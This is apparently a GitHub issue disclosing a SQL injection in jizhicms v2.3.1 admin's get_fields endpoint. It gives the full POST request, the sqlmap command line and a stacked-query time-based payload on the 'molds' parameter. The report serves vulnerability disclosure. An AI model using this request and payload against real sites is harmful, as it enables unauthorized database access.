jizhicms v2.3.1 has a vulnerability, SQL injection

version: v2.3.1
Problematic packets:
```
POST /index.php/admins/Fields/get_fields.html HTTP/1.1
Host: 192.168.10.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.130/index.php/admins/Comment/editcomment/id/3.html
Content-Length: 24
Cookie: language=en-gb; currency=USD; PHPSESSID=67c4b6e9ea40f3030a8987fcb94be158
Connection: close

molds=comment&tid=0&id=3
```
backstage->Interactive Management - > comment list, and grab a package
![image](https://user-images.githubusercontent.com/60609675/179772785-11dd848a-f80b-4ed7-bdaa-955b21f7a26e.png)
![image](https://user-images.githubusercontent.com/60609675/179772998-d9d64b4e-ad34-478a-9135-d972a9dbc64b.png)
use sqlmap: sqlmap -r test.txt --level 3 --random-agent --batch
![image](https://user-images.githubusercontent.com/60609675/179773336-ea23c5e8-4344-4f63-b752-b92519539ffe.png)
```
---
Parameter: molds (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: molds=comment;SELECT SLEEP(5)#&tid=0&id=3
---
```


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

jizhicms v2.3.1 has a vulnerability, SQL injection #78

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development